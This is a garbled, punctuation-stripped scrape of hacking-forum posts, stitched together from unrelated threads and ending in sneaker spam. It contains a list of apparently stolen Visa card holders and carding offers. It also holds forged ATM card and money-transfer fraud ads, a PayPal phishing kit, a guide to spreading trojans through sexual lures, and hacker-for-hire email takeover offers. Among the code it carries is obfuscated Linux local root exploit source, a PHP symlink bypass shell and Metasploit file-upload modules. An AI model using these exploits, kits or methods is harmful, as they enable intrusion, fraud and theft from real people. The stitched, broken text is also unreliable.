credit cards accounts hacked you can buy online exp sec code billing zip code patricia blanco suarez visa visa exp name lonnie white visa exp name adam gardner card visa sec. 
streets visa exp name gaydish visa exp name joseph chiatello ups freight collectvisa exp name david blenkinsop visa exp name domingo dias visa exp name richard powell visa new exp name jeremy lopes exp code name mike feudale visa exp name earl. 
harris visa exp name unifirst corporation visa exp name john walker visa exp name chris smith exp code name mike feudale. 
pratham wrote take this. 
windows bro just want ask one more qusetion that can use putty university unblock websites then meanz that can use socks and socks proxies bypass the web filter. 
need check this one out. 
doe wrote don't know this really works not but see this can help you out. 
pratham wrote bro using proxy with port use this sites. 
sarcastic blum yes was using that becoz using proxy with port everything was unblocked but how they are not working. 
thanks lot for sharing this. 
thank you much mate. 
but where the shell file. 
thanks man i'll see this booter. 
how can about send message please can any one help with with good cvv admin shop. 
need strong cvv that would work. 
com wanna buy flight ticket thanks guys waiting for reply. 
will like able download the rdp crack. 
thanks mate for this looking long time. 
tha right bro damm have try. 
download any one mirror iso file parts. 
cool will test now thanks. 
codefire wrote hidden content you must reply see linkswhat rfi remote file inclusion remote file inclusion rfi type vulnerability most often found websites. 
thanks again bro but can not find the builder. 
hello guys managed get the databases website with sql injection found these databases information schema tdessaules tdessaules joomla also the admin login page located. 
com administrator the tables information schema are useless tdessaules database was empty the tdessaules joomla had table called jos users and another one called jos jev users from the first found usernames passwords the second was useless but these userames where only for connecting from another login form and not joomla. 
first question solved possible the joomla control panel username password not found inside sql database answer there where two accounts one for joomla and one for the other form after logging the site found form where could post content like blogs. 
itemid the form called smart blog. 
jpg then upload and with burp suite change shell. 
tried naming shell shell. 
php jpg this also didnt work. 
second question can someone give some other ideas try dont really know what else read still waiting for some ideas just for the knowledge uploaded the shell through joomla. 
man you the best. 
thanks for this great tutorial. 
leme see will check. 
txt file seriously hit that button that's motivating factor hidden content you must reply see links password hack port. 
note this not crack just found and may infected please run deep scar and download your own risk hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
features anti keylogger system protection anti clipboard logger anti screen logger anti voice logger world first keystroke encryption browser security anti webcam logger how activate download and install software restart important run click enter key enter the registration details given click activate that all enjoy seriously hit that button that's motivating factor hidden content you must reply see links note always perform virus scan and download your own risk hidden content you must reply see links ndx. 
going give this try out thank you. 
codefire wrote inurl submitticket. 
wouldlike see how effective the toolis. 
cheers mike wanna try this. 
let check how works. 
codefirenice lol hope can understand wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
let's see what you got. 
any new updates this works well for far. 
tut will try later. 
its really please want see this. 
look forward trying this. 
bro cpanel use for hosting our sites. 
can send receive mails using dcot protocols like smtp imap protocols. 
can use free sites for sending bulk messages. 
thanks for share mate. 
cool enter keywords search thread pages next new reply quick reply. 
i'll see how this works what language written bond benz wrote hidden content you must reply see linkssql scanner. 
good work you have done. 
thats awsome thanks lot. 
prob the same old script method that works for bit then bang lose coin its rubbish. 
someone only looking for referals method just nothing. 
dont click the download button. 
anyone have proof and till now can use. 
nice can use this. 
hope find useful stuff. 
let's test and then feedback anyway thanks for the upload man. 
painkiller wrote hidden content you must reply see ghost eye fast hack program with alot features like strong denial service attack dos attack crypter file binder fast smtp mail sender website resolver skype resolver checker tracer with alot features live chat and alot other features that will help you ghost eye was coded hisoka ismael from morocco remember hisoka not responsable for the use this product it's for educational purposes only. 
local root exploit author hackeri email hotmail dot group uah united albania hackers web uah. 
greetz loock ckd diagnostic test for cve public exploit greg price ksplice inc. 
tests whether the system has previously been exposed the exploit published hackerial. 
based the original exploit code. 
for more information see. 
com uptrack cve include. 
ifndef error else define gnu source define dgdhdytrg unsigned int define ytgetrfd unsigned long long define dhdyetgdfstreg memcpy define vert define norm define banner vert tch norm linux kernel. 
kernel define kallsyms proc kallsyms define tmagic tdfdrts proc timer list define selinux path selinux enforce define fops timer list fops define per dhhdydgtrem per cpu current task define prepare ggdtsgfsrfsd prepare creds define override ggdtsgfsrfsd override creds define revert dhdgtrrtefdtd revert creds define smap define cmap define stop smap xffc define define define page size define kern define kern define kern define kern dis idt define kern dis dgdghhyttfsr fops define kern dis ggdhhdyqeewr ppoi lsm define kern dis sel nux define isrhhgdppladsf ver strstr ver. 
define try remap default define. 
fprintf stdout while define tegddewyfg fprintf stdout while define hshsgdt perror exit while define tegdtfsrer fprintf stderr exit while static char buffer static int static int flags volatile static socklen magiclen static int useidt usefops uselsm static ytgetrfd fops cred static dgdhdytrg cpu off static char krelease static char kversion define static char ttrg xbe xdb xeb xff xff xeb xcc define off define yggsfdartdf dhdytegrdfd define tdgfsrsllsj shsystgd char xbb xff xbb xff xbb xff define rjmpddtgr off define rjmpddtgr dhdytgscavsf define rjmpddtgr gdtdgtsfrdft static char ttrfd xff implement selinux bypass for idt define rjmpddtgr off idt define rjmpddtgr dyhhtsfdare define rjmpddtgr dhdysgtsfdrtac static char ruujhdbgatrfe xff xcf define cje tffdtrmajhd off define rjmpddtgr static char dis blens sel nuxhayettgdr xba xba rhel lsm stuffs define rhel lsm off struct lsm rhel ytgetrfd selinux ops ytgetrfd capability ops ytgetrfd dummy security ops ytgetrfd selinux enforcing ytgetrfd audit enabled const char krelease const char kversion struct lsm rhel known targets ull fec ull acc ull ull ull. 
smp thu sep edt manage minor bug fix changes ull ull afc ull ull ull. 
smp wed jan est ull ull ull ddf ull ull. 
xen smp wed jan est default xen ull selinux ops ull capability ops afc ull dummy security ops ull selinux enforcing ull audit enabled. 
smp wed jan est tripwire target lol static struct lsm rhel curr target null dyn labeggeyrthryt struct socketcallat int int level int optname void optval volatile socklen optlen attribute packed struct idt from unsigned short limit unsigned long base attribute packed static ytgetrfd getidt struct idt from idt memset idt sizeof struct idt from asm volatile sidt idt return idt. 
base ull static int file selinux selinux fopen selinux path selinux null errno eperm return else return fclose selinux return static int wtfyourunhere char out release char out version int ret const char ptr int count char bptr struct utsname buf ret uname buf ret return strcpy out release buf. 
release strcpy out version buf. 
release bptr memset sizeof while ptr count ptr ptr bptr ptr else break ptr. 
count ptr strlen atoi return return atoi static void tch sel nux struct lsm rhel table ytgetrfd dis blens sel nuxhayettgdr cje tffdtrmajhd off table selinux enforcing ytgetrfd dis blens sel nuxhayettgdr rjmpddtgr table audit enabled dhdyetgdfstreg ttrfd rjmpddtgr gdtdgtsfrdft dis blens sel nuxhayettgdr sizeof dis blens sel nuxhayettgdr dhdyetgdfstreg ruujhdbgatrfe rjmpddtgr dhdysgtsfdrtac dis blens sel nuxhayettgdr sizeof dis blens sel nuxhayettgdr static ytgetrfd get sym const char const char filename int ignore flag file char line char reloc char reloc flags kern ignore flag return fopen filename return while fgets line null char line char reloc char reloc memset reloc sizeof reloc memset reloc sizeof reloc while reloc while reloc strcmp reloc reloc return strtoull reloc null return static inline ytgetrfd get sym const char return get sym kallsyms static int parse cred const char val int const char val char local for memset local sizeof local local while return cred strtoull local null return define selinux ops selinux ops define dummy security ops dummy security ops define capability ops capability ops define selinux enforcing selinux enforcing define audit enabled audit enabled struct lsm rhel lsm rhel find target int check rhel int char mapbuf struct lsm rhel lsm known targets check rhel isrhhgdppladsf krelease tegddewyfg return null tegddewyfg. 
for ikrelease strcmp kversion lsm kversion tch azt. 
lsm krelease lsm kversion return lsm tegddewyfg mput aqu. 
strcpy mapbuf boot system. 
map strcat mapbuf krelease dyn labeggeyrthryt. 
selinux ops get sym selinux ops mapbuf dyn labeggeyrthryt. 
dummy security ops get sym dummy security ops mapbuf dyn labeggeyrthryt. 
capability ops get sym capability ops mapbuf dyn labeggeyrthryt. 
selinux enforcing get sym selinux enforcing mapbuf dyn labeggeyrthryt. 
audit enabled get sym audit enabled mapbuf dyn labeggeyrthryt. 
selinux ops dyn labeggeyrthryt. 
dummy security ops dyn labeggeyrthryt. 
capability ops dyn labeggeyrthryt. 
selinux enforcing dyn labeggeyrthryt. 
audit enabled return null return dyn labeggeyrthryt static void put your hands hooker int argc char argv int ver ret char open kallsyms rdonly ret read dummy read ret tegddewyfg kallsyms tch flags kern close ver wtfyourunhere krelease kversion ver tegdtfsrer fuq krelease argc while ret getopt argc argv siflc switch ret case 'i' flags kern dis ggdhhdyqeewr ppoi lsm kern dis dgdghhyttfsr fops useidt have use force idt vector break case 'f' flags kern dis ggdhhdyqeewr ppoi lsm kern dis idt break case 'l' flags kern dis idt kern dis dgdghhyttfsr fops break case 'c' optarg parse cred optarg tegdtfsrer break case 'k' optarg fops strtoull optarg null else tegdtfsrer numb break case 's' tegddewyfg fuq nux else flags kern dis sel nux break case 'o' optarg cpu off strtoull optarg null else tegdtfsrer mput numb break ver needs cred structure flags kern cred cred cred cred get sym prepare ggdtsgfsrfsd cred get sym override ggdtsgfsrfsd cred get sym revert dhdgtrrtefdtd cred cred cred tegdtfsrer err llc tegddewyfg kernel credentials detected ytgetrfd off cred ytgetrfd yggsfdartdf dhdytegrdfd cred ytgetrfd tdgfsrsllsj shsystgd cred ver needs cpu offset flags kern cpu off cpu off dgdhdytrg get sym per dhhdydgtrem cpu off tegdtfsrer err llc tegddewyfg per cpu dgdhdytrg ttrfd rjmpddtgr dhdytgscavsf cpu off dgdhdytrg ruujhdbgatrfe rjmpddtgr dyhhtsfdare cpu off static void env prepare int argc char argv put your hands hooker argc argv flags kern dis dgdghhyttfsr fops try fops tegddewyfg trying the fops fops get sym fops todo check for newer kernels which has timer list struct thanks the guy who killed this vector. 
you know who you are lucky for you there are more fops usefops tegddewyfg usefops flags kern dis ggdhhdyqeewr ppoi lsm try lsm rhel curr target lsm rhel find target curr target tegddewyfg 'll else uselsm useidt flags kern dis sel nux flag curr target lsm rhel find target curr target tegddewyfg ntinu linsux. 
remove selinux flag flags kern dis sel nux usefops useidt uselsm tegdtfsrer ryth try static inline int get socklen ytgetrfd addr dgdhdytrg stack int socklen stack addr return socklen static struct socketcallat static dgdhdytrg idtover static void. 
optlen magiclen static void bitch call struct socketcallat void stack asm volatile push ebx push esi push ecx push edx movl eax movl ebx movl esp esi movl ecx movl esp int movl esi esp pop edx pop ecx pop esi pop ebx stack memory eax ecx ebx esi static void setmcbuffer dgdhdytrg value int dgdhdytrg dgdhdytrg buffer for. 
events pollin pollout poll pfd else uselsm int msqid ytgetrfd selinux msg off curr target selinux ops rhel lsm off ytgetrfd dummy msg off curr target dummy security ops rhel lsm off ytgetrfd capability msg off curr target capability ops rhel lsm off msqid msgget ipc private msqid hshsgdt msgg magiclen get socklen selinux msg off stop setmcbuffer bitch call void stop magiclen get socklen selinux msg off stop setmcbuffer bitch call void stop magiclen get socklen dummy msg off stop setmcbuffer bitch call void stop magiclen get socklen dummy msg off stop setmcbuffer bitch call void stop magiclen get socklen capability msg off stop setmcbuffer bitch call void stop magiclen get socklen capability msg off stop setmcbuffer bitch call void stop msgctl msqid ipc rmid struct msqid null exploit munmap void cmap page size exec getuid pid pid tegddewyfg pid fork pid char args bin null char envp term linux bash history dev null history dev null history dev null histfile dev null histfilesize path bin sbin usr sbin usr bin usr local bin usr local sbin null execve bin args envp else int status waitpid pid status else tegddewyfg fuq. 
fuq close return endif. 
thanks for that code bro. 
codefire wrote completely free alternative acunetix vega free and open source scanner and testing platform test the security web applications. 
codefiretha wrote cpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hide reply hide reply password hide reply hide reply thanks. 
rajbitsathy wrote thanks for info welcome. 
amazing post always thanks man. 
this tutorial will show you how spread your trojans viruses etc. 
you can find omegle spreader here. 
first all for this method you will need ave. 
com syurwivjov now login your fileave account upload your keylogger rat whatever and copy the direct link for your virus. 
exe replace with your virus 'direct' link. 
com there are lot horny men who will anything see female cam. 
com alright after you have got your video prepared account registerd. 
com with the username and password you registerd with. 
not getting many people visiting your rooms think helps you set display picture google and find some nice real looking picture girl sucking cock something and while your. 
comat the top were you found the broadcast button click edit then click edit images then upload your new image. 
get rid use roboform which you can get from. 
you can use public torrents such. 
com you can use private torrents they are the best because people are trustworthy there. 
thanx bro veri nice. 
nice post and need your software. 
hey guys today would sharing this email spoofer hidden content you must reply see this content all credits crypt. 
thanks its good job thanks. 
thanks for thge share gimme the password for the rar file. 
thanks for the exploit advance. 
wrote thank you very much always welcome buddy. 
really appreciate the dump. 
sent from htc one using tapatalk. 
wrote codecanyon traffic bot adf. 
end demo spt pejv skitt netw hurr kinglet skipp amo vahid ahmadbady iskorpitx hellboy cyber terrorist and all best friend. 
thank you very much for this software. 
good and cool thing. 
what you can find this shell from hidden content you must reply see links shell password indianhacker. 
mybb method humiliated this site and generate invisible logger code code size color. 
org color size size take invisible image url paste image url avatar url mybb forum and change avatar iplogger again and click view log log should allready filled see mybb forum mail method find mail from site which you need and read headers gmail show original code received from gator. 
com postfix with esmtp for sun jun cdt size. 
wow looks amazing love. 
very use full lets test. 
introduction file upload vulnerability thnks works. 
wrote table width mew member here doing wrong see hello friends this trick still working dont beleieve look the below trick posted. 
thanks microsoft windows professional rtm english dvd iso build. 
nice tool thank for that usefull. 
thanks for posting man. 
very good will love have more please. 
reply for hidden contents. 
sounds cool will try. 
that after verify the debit card. 
say that you give your pan card copy for name verify. 
actually make this account ramesh kumar bhatiwal but actually name documents ramesh kumar and name pan card ramesh chand. 
but did not accept. 
for this can not redieem send money from paypal account another location. 
mailed them many time but they did not fix they say that give your actual pan detail that telling about your name card. 
ping hidden content you must reply see links you will get. 
all done hidden content you must reply see links. 
connect with part finish logout thanks for tut. 
here's the link get started hidden content you must reply see links. 
use hidden content you must reply see links you want quickly get number that will work for this you can put anything for the info when you first start the app. 
you've already heard about that suggest hidden content you must reply see links somewhat similar but another incredibly easy way make money. 
thank you for this great tutorial. 
friend request bomber too requests hour nice share thanks mate. 
attach attach config attach uyf great. 
doe gonna check out wrote hide all. 
many thanks will useful the future. 
lets sent from iphone using tapatalk. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name after download open app give root permissions click grant after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect then will take seconds maximum boom will show you wifi password now wifi has wps available and vulnable wifi not vulnable then will give you error you got this error then your bad luck codefire wrote how crack wifi password android crack wifi password android android most popular for any users. 
let check hope works for. 
thank you for posting thank you for post nice post. 
cool want try this. 
the link expired think. 
hidden content you must reply see links you want quickly get number that will work for this you can put anything for the info when you first start the app. 
hope it's works anyway. 
daredevilthx wrote great bro. 
the method step one hidden content you must reply see this content credits this isn't method nor download link. 
credits the owner hidden content you must reply see links for the download links. 
thank you brother very good. 
how setup your own proxy server for free simple google search like proxy servers and you find dozens hidden content you must reply see links the internet that will help you create proxy servers minutes for free. 
create free proxy server with google app engine here one such hidden content you must reply see links that you can build for your friends china even for your personal use say for hidden content you must reply see links from office. 
step hidden content you must reply see links and sign using your google account. 
hidden content you must reply see links download the. 
step once python installed hidden content you must reply see links download the google app engine sdk for python and install. 
step download this hidden content you must reply see links and extract some folder your desktop. 
visual tour setting free proxy with google hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links you can edit the main. 
update credits the proxy server uses code from hidden content you must reply see links open source web caching project hidden content you must reply see links. 
screenshoot download hidden content you must reply see this content. 
curios whether not this works which assuming does hes admin. 
thank you for nice information. 
thank you vry much. 
it's interesting how many people claim this working when clearly just joke. 
google isn't stupid enough use encryption. 
let rephrase this one just uses even sha encryptions. 
they always salt them prevent people from using rainbow tables. 
chances are google not only salts their hashes but they probably multiple passes. 
would interested hearing just exactly how this poster cracks the passwords. 
since what claiming seems far fetched. 
php code else safe off echo safe mod safe open safe mod end disable functions ini get 'disable functions' echo none else echo disable function end else safe off echo safe mod safe open safe mod end disable functions ini get 'disable functions' echo none else echo disable function end php. 
symlink open basedir bypass chujwamwmuzg fakedir fakedep num offset symlink. 
num empty get 'file' file get 'file' else empty post 'file' file post 'file' else file echo symlink killer. 
symlink bypass symlink open basedir nam file nam that want create and sse rum syml. 
style border solid symlink bypass symlink open basedir bypass from php. 
empty file exit writable. 
fakedep fakesymlink this loop will skip allready created symlinks. 
while true symlink fakesymlink. 
num break else num unlink fakesymlink mkdir fakesymlink die 'check symlink. 
printable version send this thread friend subscribe this thread forum jump users browsing this thread zeynnymouz. 
antiviruses scan result link hidden content you must reply see links downloading link hidden content you must reply see links. 
download hidden content you must reply see links virustotal hidden content you must reply see links. 
wincom modulecom googledork nil date author softwarelink phpwindows version. 
eip eip eax deodrant axespray str repeat eip. 
eax echostrlen axespray echo php. 
wincommodule com sink day echo byrahulsasi twitter. 
com echo nmicrosoft xppro echo. 
com blogs web app remote code execution via scripting engines part local exploits php day for axeeffect axeeffect axeeffect deodrant. 
axespray terminate deodrant deodrant. 
terminate vvar newvariant offset vvar newvariant buffer. 
xff var newvariant com event sink vvar var buffer. 
thank you looking forward trying this out. 
thank you for tutor dude how run this script windows. 
after that paste hash code and hit enter finaly you will see the ruselt and now you know you can use passowrdpro hidden content you must reply see links color. 
very nice bro thanks for sharing. 
the file link longer available. 
please upload thank you. 
lets have look and see work. 
let check this out thanks. 
this simple guide read somebody else facebook messages without any effort cheers wow thanks againmike. 
thanks bro will have look. 
anyone wrote anyone here tried this exploit newer android like. 
and used the provided and managed sent android test phone which. 
anyone tried exploit this with another means than mms thx for share. 
replying see how this works. 
links suspended affiliate account. 
exploit foscam cameras improper access restrictions codefire last post paracoda paypal cookie stealer exploit xss free codefire last post ironfiber jpg exploit for rat and botnet twistakelv last post privateloader how exploit. 
alexsupertramp wrote wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
curiosity kills the cat. 
paypal will like know more about. 
application website hidden content you must reply see links protection type serial packer protector non release type patch serial crack download link code. 
lets give this try thank you for sharing. 
what sites are they will take look. 
let's give this shot and see what come with. 
onsole' wonsole' wonsole' wonsole' wonsole'. 
good cyberghost terms features. 
yes its running vmware cool cool but need external usb wifi card. 
interesting lemme take look. 
thanks for this amazing post. 
very nice dude good. 
download hidden content you must reply see this content before use turn off antivirus run sandboxie for safe. 
how when where sarcastic blum shout. 
very nice will try this thanks for sharing. 
cool man thanks for sharing. 
thank hope make friends with you. 
chinese from mailbox was. 
thnx lot will try. 
thats work test dulu. 
olnion tor almost undetectable all the anti viruses. 
will surf them thanks for the share. 
referer link changes from hidden content you must reply see links hidden content you must reply see links step open regedit. 
nice share checking out. 
good job waiting for the reviews. 
thx good inf from noo ereg globals vtuggwokp server server name globals woefxl header globals lvlnkgh message nuhbsdm subject globals obuaupoah. 
com phlcnbip message globals uapxoloiox globals tdlutg globals znfjprtyhw from benz. 
com globals flnowbsyc sentmail globals eehloair link. 
file globals flnowbsyc mail globals uapxoloiox nuhbsdm globals lvlnkgh globals woefxl echo exit. 
injector botnet function http grabber firefox chrome download execute udp flood ddos chat massagebox download hidden content you must reply see this content. 
thx alot bro for the day. 
codefirecc wrote the basic concept behind the cracking wep key using aireplay replay arp packet generate new unique ivs. 
make sure for wireless hacking you have compatiblce wireless card. 
cap final screen shot cool can't wait try this program out. 
thanks for sharing testing. 
fbfb sgsgs ssgsrhgr hre. 
thank you man tnks tnks. 
check the link works. 
hello followed the above tutorial but when tamper data adn write shell. 
php says not found site. 
download for linux pls senpai alright checking out windows computer smh linux please only ever use linux. 
will try soon thanks advance. 
ejlidibi xepnt hodbfygjeqaqmg don't really use these but thanks. 
codefiretha wrote how crack wifi password android crack wifi password android android most popular for any users. 
wrote facebyte facebook facebook facebyte scraper facebook. 
txt facebook facebook facebook facebook lockveiw facebook vids beta networker facebook instagram bomb. 
thank bro hope its not infected. 
wanna see what there. 
tnx man for this informaton yarram. 
thanks for you ill try now. 
sounds exciting let give try. 
thanks alot for this share appreciate. 
what this want see. 
thanks brother but its only for country. 
this simple guide read somebody else facebook messages without any effort cheers mike don't tell this fake post. 
merry mass all frm team size ihf size good enjoy day exploits cool hidden content you must reply see links this file part the metasploit framework and may subject redistribution and commercial restrictions. 
hidden content you must reply see links require 'msf core' require 'msf core exploit php exe' class metasploit msf exploit remote rank include msf exploit remote include msf exploit phpexe def initialize info super update info info 'name' 'wordpress property php file upload vulnerability' 'description' this module exploits vulnerability found property. 
body print status peer executing payload payload name res send request raw 'uri' upload uri 'method' 'get' end end hidden content you must reply see links this file part the metasploit framework and may subject redistribution and commercial restrictions. 
hidden content you must reply see links require 'msf core' require 'msf core exploit php exe' class metasploit msf exploit remote rank include msf exploit remote include msf exploit phpexe def initialize info super update info info 'name' 'wordpress asset manager php file upload vulnerability' 'description' this module exploits vulnerability found asset manager. 
looks like solid pack good looks. 
will pay someone make working facebook phishing page. 
this urgent need with very good reasons. 
very nice thank you. 
codefire wrote what rfi remote file inclusion nice remote file inclusion rfi type vulnerability most often found websites. 
please help with fresh shells. 
microphone remote chat funbox clipboard network manager download manger kill proccess server run admin privilage victime tutorial hidden content you must reply see this content need this send mail email hidden content you must reply see this content. 
should wait for the third version what will the new features. 
johan cyril lazaro wrote admin wrote color cpanel nightmare priv times faster from puplic version its shows becoz its code. 
can passwd for rar mate will greatfull regards. 
nice share rhanks for the share. 
update hide reply hide reply whats new you can now enable the feature auto start the stealer when the phone boots you can now enable the feature delete the zip file after uploading sms thread fixed and optimized sms stealer now includes date and fixed your trying dump tutorial wanna give you codefire wrote the first not android stealer ever created raziel presents razstealer. 
net framework hidden content you must reply see links. 
download and install wamp hidden content you must reply see links. 
instructions disbaling service are here you aren't sure how hidden content you must reply see links. 
download hidden content you must reply see links tut sib. 
white wrote paypal scam new features indetectable anti bot this scam allow you get full victims info logins email password personal information full name date birth billing address credit card card number exp cvv secure password bank details account number password how use upload paypal. 
cheers mike lets see how works thanks. 
account has been deleted bud. 
thnx biokinetix wrote anonymous surfing vpn and proxy tools there are many options when comes being anonymous online. 
haid wrote greed wrote how crack steam accounts. 
nice can you please add some more. 
wrote table width hello friends this trick still working dont beleieve look the belowlets trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike lets see works. 
wrote table width hello friends dsvfwefwe fwefew this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort fwefwe cheers ewfwef wffewfew mikefwefewfwef. 
thanks man for this share appreciate much. 
have say that love you much. 
great great thx dear. 
wow thank for this mann. 
pls will like see hide content how creat dropbox please. 
thanks for the greeat post mate going give this try. 
its good but whats the need doing manually when their are are patches for all internet download managers. 
have look this link have all the latest version internet download managers with patches and bring all the latest ones this link link removed. 
let try plz want know. 
this simple guide read somebody else facebook messages witho. 
thanks for reading tutorial and have nice day attach attach nice hope still works thx. 
open vuln for this long. 
thanks for this let see man. 
will for sure test this will for sure test this. 
will adhere the rulez here. 
will think abt gettin vip once like this place. 
are now able fully encode working atm cards. 
the card pin work combination allow cash withdrawals the atm technology are using the same technology seen prepaid cards which allows avoid encoding the actual chip which extremley difficult. 
our technology also allows increase daily limits. 
card has limit the atm can increase. 
ship worldwide all countries the price fair and non negotiable. 
experienced customers will considered for future cashier work. 
guarantee our atm cards are guaranteed work. 
global atm's cash machines. 
all cards are pre checked and guarantee these points each card will live upon arrival your destination each card will supplied with working pin code each card will work for least atm withdrawal timewasters beggers allowed. 
this interests you contact icq western union money gram transfers now available bravo verified western union and money gram transfers are now available the following countries worldwide transfer clearing time western union money minutes service minutes money gram express payment service minutes method not use bugs counterfeit money use compromised agent terminals through malware direct bank deposits via bank data rules our western union and money gram transfers have high success rate and are guaranteed clear without any delay problem. 
only serious members are welcome any time wasters will reported admin. 
professional and regular customers will considered for future cashier drop service work. 
this services interest you contact icq. 
lets try this hacking yea much better. 
thanks looks very helpful. 
thank you now let see how work. 
thanks for your effort. 
everyone name doris clerck here show appreciation the hacker that got all the necessary informations back the divorce. 
want people know that there solution every obstacle and sure reid kahn will solve any form problem. 
you can contact him via email cyberkahn gmail. 
good luck everyone name doris clerck here show appreciation the hacker that got all the necessary informations back the divorce. 
you can contact him via email cyberkahn gmail dot com. 
you can contact him via email cyberkahn gmail then the dot com you. 
can someone teach how hack someone instagram account skype blesszinky kik cydia won. 
thankss brother let's see. 
what are those invite codes. 
need help for something personal' will pay for get solved trouble. 
'ai pei unknow taiwan blacklist yes checked. 
arizona united states blacklist yes checked. 
net italy blacklist yes checked. 
wrote table width hello friends this trick stilokal working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike okay. 
wonder what includes thanks for the share. 
thnx men for posting lot. 
wow good this butiful. 
team consisting highly efficient developers and hackers. 
contact email ghosthackinc gmail. 
reply for test this post working. 
thanks for the helps here. 
doe wrote droid jack rat. 
ejlidibi xepnt hodbfygjeqaqmg nice share. 
but honestly think droid jack trash. 
okay lets take look. 
adfda this list deep websites their invite codes should they require one. 
nice shitty logo yeah know well you're here for the program. 
just trying learn your new trick. 
codefire wrote the first not android stealer ever created raziel presentsggn razstealer. 
doe wrote tools premium. 
doubt the link will still active. 
will try really not. 
thanks very much good job. 
great want check out. 
thanks for sharing broo. 
chineke anyi geh weh this chedda. 
keep the good work bro. 
nice this useful cco. 
thankz for share dude. 
inexpensive nike shoes for basketball that shoe features all the components that are utilized nike's more expensive designs. 
few different colorways the shoe have released and they are perfect that you display what sorts gamer you are really. 
ideal read testimonials about any product that you can buy help you certain you have the suitable product. 
nike huarache mens black wolf grey black volt when you land the shock will absorbed the air that's trapped while the unit thus producing less harm for feet and delivering much springier feel plus cushioned one from that. 
plus black dark grey black are all readily available for purchase right these days. 
additionally very light because having plenty with perforations. 
the shoe likewise very durable due this the air max pure game also the mid cut shoe and shows synthetic molded higher grip the underside simple but mainly located around the actual heel and forefoot area where lot the impact takes put and where traction necessary. 
this kind very famous set two shoes likewise something that meets every member with the family from gentleman woman child which running shoe that versatile some way both shoes work with solid herringbone rubber the out sole. 
this pair nike's you have been balling set for the last couple years coming apart the seams. 
the particular three colorways which may have released the particular this shoe are traditional variety colorways this shoe include white black sport purple. 
nike air force flyknit mens first time users tend feel that the shoe can quite bouncy but they get acquainted with fairly easily. 
some that won't collapse when you complete quick cut about the hardcourt you could get them low prices the truth and won't hit you for arm along with leg. 
these shoes are actually designed specifically for many who run lot and there were various versions which right from some time the first type was launched inside more viewing your toes since you speed down the basketball court. 
absolutely the reason that classic reissue holds classic indeed premier quality shoe that's produced the famous nike brand name. 
there are pairs that include asking price. 
while the heel isn't tight enabling but far more protected than others the good news very durable outsole rubber there protect from just about any knocks blobs. 
they have got certain drawbacks. 
shoes that won't come apart the seams. 
nike huarache mens white the nike air max quarter mid cut shoe that includes both synthetic well mesh it's upper. 
taking the nike air force competitively you will notice that once you put them done you will sense secure feel that the durable. 
this shows the user several traction this means you can concentrate your game protected shoes many the stressful work suit your needs you can obtain these shoes lot colorways. 
you get decided you need fresh pair shoes and boots for basketball black white varsity red colored truth. 
even though these shoes usually are advanced. 
along with black silver photo blue black. 
it's definitely time for your new pair regarding basketball shoes users also take certain amount time get used the heel toe transition the fact that shoe offers. 
the particular shoe fits well and great for aggressive play pair which will stand the test your time. 
the best throughout technology that nike has offer must used the construction your shoe. 
the particular shoes gives lots ventilation that foot whilst addition providing considering the necessary support comfort well performance. 
actually possible buy couple high quality basketball shoes that can actually have the funds for the answer will. 
high performance basketball shoe that certainly very affordable. 
firstly the nike air force feels true size after you put upon. 
yes the nike air force has surroundings max unit which seems bubble within the outsole which seemed just mentioned prior. 
nike air max around the top the shoe where the brand new collar wraps throughout the foot secured tightly into position this not optional for allowing the actual feet move. 
running air force shoes you will feel flexible even more relaxed than anyone expect. 
and these two shoes are meant last longer versus two years took that you can blow out ones last pair now. 
the mid sole uses phylon plus contains nike max air unit. 
another major benefit offered shoe comes the specially designed mesh upper. 
add you can have the sneaker just about everywhere and you not have worry about you hurting you. 
the upper the shoe constructed special style foam that adjusts into the shape the foot. 
that you're really getting fed being able see number your toes since you head the courtroom after snagging your rebound they include nike air. 
the nike air max pure game another basketball shoe that you may purchase and not have access empty your bank account doing therefore. 
but this time you'll need quality couple. 
nike air max mens like the air max quarter max air unit and phylon widely used the core sole. 
perform the high level. 
again recognize the question you may well asking yourself the moment. 
this without doubt very costly shoe but folks that need achieve ton speed when running are often willing purchase these shoes black eggplant silver black. 
there are lots basketball shoes available the today's marketplace. 
there are plenty options available when you're looking for buy pair nike shoes for basketball there are actually expensive options along with inexpensive options. 
there are pairs basketball shoes that come with price level. 
there are group inexpensive options. 
take into account that the inexpensive alternatives provide the lot the highest performing technologies which shoe providing the air max quarter and air max pure game are both nike basketball shoes that offer the the good quality performance standards that nike famous for. 
will try this thanks brother. 
not the best but definitely gets the job done. 
when the work done show you some proofs. 
usually the screenshot content target email. 
after your approval you send money then send you hacked email with instructions how use. 
notice you pay when your target email was hacked. 
prepayment pricing email can categorized into two basic types web based service. 
open web based email service and closed web based service. 
for instance open web based email service google yahoo outlook etc. 
closed web based service corporate accounts are emails which based private domain name. 
any open web based email service closed web based service starts from and depends specific email get more information and order text yuyportach gmail. 
thread modes hack almost everyone. 
every facebook and email via facebook hack sruthy offline member posts threads joined jun reputation money donate tutorial hack anyone facebook email. 
tut thehackerboy image ihf. 
hacker offline senior member posts threads joined oct reputation money. 
donate nice tut thnx thnx drinks keep visiting and grow our thread collection blackhat you want dump blackhat error offline junior member posts threads joined may reputation money donate can posy tut for fud codefire wrote tutorial hack anyone facebook email. 
png url image contactw. 
png this can hard you don't have this person your friend anyways you can ask his her email you know him. 
tut thehackerboy error offline junior member posts threads joined may reputation money donate can expain fud offline junior member posts threads joined aug reputation location urmind. 
donate sruthy wrote tutorial hack anyone facebook email. 
tut thehackerboy weatonsrcool offline junior member posts threads joined aug reputation location chile country chile money. 
kinda new this but how you keep the information safe encryption offline junior member posts threads joined aug reputation location usa country united states money. 
donate lets see working method just another time waster popman offline member posts threads joined aug reputation location egypt country egypt money. 
donate unnamed offline junior member posts threads joined sep reputation location home country afghanistan money donate sruthy wrote tutorial hack anyone facebook email. 
